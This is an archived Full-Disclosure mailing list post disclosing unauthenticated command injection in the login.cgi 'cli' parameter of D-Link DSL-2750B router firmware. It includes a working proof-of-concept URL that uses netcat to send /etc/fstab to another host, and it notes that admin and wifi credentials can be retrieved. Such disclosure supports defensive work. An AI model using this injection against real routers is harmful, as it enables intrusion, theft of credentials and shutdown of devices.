lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 5 Feb 2016 17:39:31 +0100
From: p <p@...ntumleap.it>
To: fulldisclosure@...lists.org
Subject: [FD] D-Link router DSL-2750B firmware 1.01 to 1.03 - remote command
 execution no auth required

After some playing around I've noticed something interesting during
login phase: by sending wrong credentials, user is redirected on an
error page with url

http://192.168.1.1:666/login.cgi?cli=access%20login%20encrypted%2041544A25DC00170BA90659AD4CBDD9D9$

http://imgur.com/ZG1vU2t

In order to see what's happening we must start the web server with the
debug output enabled:

httpd -o -p 666 -m -1 -v 5

and try again to login with wrong credentials.

http://imgur.com/tepy3XD

Arguments of "cli" parameter are passed directly to a binary that will
execute that particular given command; the complete list of commands
available are inside "/etc/ayecli/ayecli.cli" file. (among them there's
a creepy "system halt" that will shutdown the router no matter what).

Arguments are passed in a way that

 ayecli -c 'command-here' so

the way to escape is to close, add a command and close again to
neutralize "$" substitution with ' :

ayecli -c 'command';injection''
that is:

http://192.168.1.1/login.cgi?cli=multilingual%20show%27;nc%20192.168.1.8%20666%20%3C%2fetc%2ffstab%27$

http://imgur.com/nLFnWeo

it's also possible to retrieve admin password, wifi passphrase etc

cheers,
p@ql

thanks to ps and fp

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ